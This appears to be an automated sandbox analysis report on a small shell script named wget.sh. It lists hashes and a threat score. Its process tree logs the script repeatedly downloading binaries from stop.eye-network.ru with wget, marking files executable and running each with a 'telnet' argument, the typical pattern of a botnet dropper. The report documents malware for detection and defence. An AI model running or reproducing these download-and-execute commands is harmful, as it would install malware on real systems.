Overview

overview

10

Static

static

1

wget.sh

ubuntu-18.04-amd64

7

wget.sh

debian-9-armhf

7

wget.sh

debian-9-mips

10

wget.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    0s
  • max time network
    129s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240508-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    18-12-2024 13:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    wget.sh

  • Size

    676B

  • MD5

    5b3ceaec7a3ad11b45f5fca1b603d939

  • SHA1

    5e5ee3fa232288f77e670c66d8ca42c0cc171e45

  • SHA256

    bb30e07b49a7b5879ee19bcd3beeab6e70ec1451833782537622e6a4b31838fa

  • SHA512

    47efd53dd2696243413fe686c9eeaccf6a0ac07afe72674bd27ee5f6583c45734295941e0540e63c0dd29e2e8f57a1638c4d3de02f7412d71005accb52dfe215

Score
7/10
defense_evasion

Malware Config

Signatures

Processes

  • /tmp/wget.sh
    /tmp/wget.sh
    1⤵
      PID:1494
      • /usr/bin/wget
        wget http://stop.eye-network.ru/wkb86
        2⤵
          PID:1495
        • /bin/chmod
          chmod +x config-err-BdnwVs netplan_2az14oqi snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-timedated.service-3Z7WBz wget.sh
          2⤵
          • File and Directory Permissions Modification
          PID:1496
        • /tmp/wkb86
          ./wkb86 telnet
          2⤵
            PID:1500
          • /usr/bin/wget
            wget http://stop.eye-network.ru/kqibeps
            2⤵
              PID:1501
            • /bin/chmod
              chmod +x config-err-BdnwVs netplan_2az14oqi snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-timedated.service-3Z7WBz wget.sh
              2⤵
              • File and Directory Permissions Modification
              PID:1502
            • /tmp/kqibeps
              ./kqibeps telnet
              2⤵
                PID:1506
              • /usr/bin/wget
                wget http://stop.eye-network.ru/bojwsl
                2⤵
                  PID:1507
                • /bin/chmod
                  chmod +x config-err-BdnwVs netplan_2az14oqi snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-timedated.service-3Z7WBz wget.sh
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1508
                • /tmp/bojwsl
                  ./bojwsl telnet
                  2⤵
                    PID:1509
                  • /usr/bin/wget
                    wget http://stop.eye-network.ru/njvwa4
                    2⤵
                      PID:1510
                    • /bin/chmod
                      chmod +x config-err-BdnwVs netplan_2az14oqi snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-timedated.service-3Z7WBz wget.sh
                      2⤵
                      • File and Directory Permissions Modification
                      PID:1514
                    • /tmp/njvwa4
                      ./njvwa4 telnet
                      2⤵
                        PID:1515
                      • /usr/bin/wget
                        wget http://stop.eye-network.ru/ngwa5
                        2⤵
                          PID:1516
                        • /bin/chmod
                          chmod +x config-err-BdnwVs netplan_2az14oqi snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-timedated.service-3Z7WBz wget.sh
                          2⤵
                          • File and Directory Permissions Modification
                          PID:1520
                        • /tmp/ngwa5
                          ./ngwa5 telnet
                          2⤵
                            PID:1521
                          • /usr/bin/wget
                            wget http://stop.eye-network.ru/woega6
                            2⤵
                              PID:1522
                            • /bin/chmod
                              chmod +x config-err-BdnwVs netplan_2az14oqi snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-timedated.service-3Z7WBz wget.sh
                              2⤵
                              • File and Directory Permissions Modification
                              PID:1526
                            • /tmp/woega6
                              ./woega6 telnet
                              2⤵
                                PID:1530
                              • /usr/bin/wget
                                wget http://stop.eye-network.ru/fnkea7
                                2⤵
                                  PID:1531
                                • /bin/chmod
                                  chmod +x config-err-BdnwVs netplan_2az14oqi snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-timedated.service-3Z7WBz wget.sh
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:1532
                                • /tmp/fnkea7
                                  ./fnkea7 telnet
                                  2⤵
                                    PID:1533
                                  • /usr/bin/wget
                                    wget http://stop.eye-network.ru/gnjqwpc
                                    2⤵
                                      PID:1537
                                    • /bin/chmod
                                      chmod +x config-err-BdnwVs netplan_2az14oqi snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-timedated.service-3Z7WBz wget.sh
                                      2⤵
                                      • File and Directory Permissions Modification
                                      PID:1538
                                    • /tmp/gnjqwpc
                                      ./gnjqwpc telnet
                                      2⤵
                                        PID:1539
                                      • /usr/bin/wget
                                        wget http://stop.eye-network.ru/wlw68k
                                        2⤵
                                          PID:1543
                                        • /bin/chmod
                                          chmod +x config-err-BdnwVs netplan_2az14oqi snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-timedated.service-3Z7WBz wget.sh
                                          2⤵
                                          • File and Directory Permissions Modification
                                          PID:1544
                                        • /tmp/wlw68k
                                          ./wlw68k telnet
                                          2⤵
                                            PID:1545
                                          • /usr/bin/wget
                                            wget http://stop.eye-network.ru/wrjkngh4
                                            2⤵
                                              PID:1546
                                            • /bin/chmod
                                              chmod +x config-err-BdnwVs netplan_2az14oqi snap-private-tmp ssh-D1rTb6cjtsFl systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-bolt.service-PTk5HI systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-colord.service-HPFOGT systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-ModemManager.service-Fv6Ji2 systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-resolved.service-tZ2Gue systemd-private-67c01c1dbb3445e09ebe41728ad8d0df-systemd-timedated.service-3Z7WBz wget.sh
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:1547
                                            • /tmp/wrjkngh4
                                              ./wrjkngh4 telnet
                                              2⤵
                                                PID:1554

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads